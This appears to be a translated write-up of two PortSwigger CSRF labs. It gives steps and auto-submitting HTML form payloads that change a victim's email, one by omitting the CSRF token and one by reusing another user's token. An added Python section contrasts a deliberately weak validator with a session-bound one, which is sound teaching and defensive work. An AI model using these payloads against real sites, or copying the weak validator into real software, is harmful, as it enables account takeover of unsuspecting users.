(Lab 3) CSRF where token validation depends on token being present (bypass by deleting the token parameter)
(Lab 4) CSRF where token is not tied to user session (the token is not bound to the user; bypass by intercepting and reusing a token)
Lab URL: https://portswigger.net/web-security
Lab 3: CSRF where token validation depends on token being present
1. Log in, change the email address, delete the csrf parameter from the request, and generate the CSRF request.
2. Store the HTML generated by Burp Suite and deliver it to the victim.
3. Then store the payload below and deliver it to the victim to solve the lab (the email address must be changed on each send).
<form action="https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email">
<input type="hidden" name="email" value="anything%40web-security-academy.net">
</form>
<script>
document.forms[0].submit();
</script>
Lab 4: CSRF where token is not tied to user session
1. Log in, change the email address, intercept the request and capture the csrf token.
2. Store the following PoC and deliver it to the victim to solve the lab (the email address must be changed on each send).
<form action="https://0a5900b5044fe6828020b7ef00c400f0.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="1123@123.com" />
<input type="hidden" name="csrf" value="44F7daYcsTeVri26CVhxlmcrXYOrCN8C" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
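Both labs come down to the same server-side mistake: in Lab 3 the endpoint skips validation when the csrf parameter is absent, and in Lab 4 it accepts any token it has ever issued rather than the one bound to the requesting session. The following Python is an added example, not part of the original post or of the PortSwigger labs: it models the change-email endpoint with a constructed in-memory session store, shows a weak validator that reproduces both failure modes, and a strict one that rejects a missing token and compares only against the token issued to the caller's own session.

```python
import hmac
import secrets

# Constructed in-memory session store for this example: session_id -> record.
# A real application would keep this in its session backend.
SESSIONS = {}


def new_session(user):
    """Create a logged-in session and issue it its own per-session CSRF token."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = {
        "user": user,
        "email": f"{user}@example.test",   # constructed initial value
        "csrf": secrets.token_urlsafe(24),
    }
    return sid


def weak_validate(session_id, form):
    """Reproduces the Lab 3 and Lab 4 mistakes (for contrast only)."""
    token = form.get("csrf")
    if token is None:
        return True  # Lab 3: no parameter -> no check at all
    # Lab 4: any token issued to *any* session is accepted
    return any(rec["csrf"] == token for rec in SESSIONS.values())


def strict_validate(session_id, form):
    """Hardened check: token must be present and must match this session's token."""
    rec = SESSIONS.get(session_id)
    token = form.get("csrf")
    if rec is None or not token:
        return False  # missing or empty token is a failure, never a bypass
    # constant-time comparison against the token bound to this session only
    return hmac.compare_digest(token, rec["csrf"])


def change_email(session_id, method, form, validate):
    """The change-email endpoint; returns True if the email was changed."""
    if method != "POST":
        return False  # state changes only via POST
    if not validate(session_id, form):
        return False
    SESSIONS[session_id]["email"] = form["email"]
    return True


def demo():
    """Run the Lab 3 / Lab 4 request shapes against both validators."""
    victim = new_session("wiener")
    attacker = new_session("carlos")
    no_token = {"email": "lab3@attacker.test"}                       # Lab 3 shape
    foreign_token = {"email": "lab4@attacker.test",
                     "csrf": SESSIONS[attacker]["csrf"]}             # Lab 4 shape
    own_token = {"email": "legit@example.test",
                 "csrf": SESSIONS[victim]["csrf"]}                   # legitimate form
    return {
        "lab3_weak": change_email(victim, "POST", no_token, weak_validate),
        "lab3_strict": change_email(victim, "POST", no_token, strict_validate),
        "lab4_weak": change_email(victim, "POST", foreign_token, weak_validate),
        "lab4_strict": change_email(victim, "POST", foreign_token, strict_validate),
        "legit_strict": change_email(victim, "POST", own_token, strict_validate),
    }


if __name__ == "__main__":
    for name, changed in demo().items():
        print(name, changed)
```

The weak validator lets both lab requests through; the strict one blocks them while still accepting the victim's own form, which is the behaviour to look for when reviewing a CSRF implementation: absence of the token is an error, and the comparison is against the session's token, not a global table of valid tokens.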
Originally published on the WeChat public account (鲲哥的Bypass之旅): portswigger CSRF labs - Lab 3, 4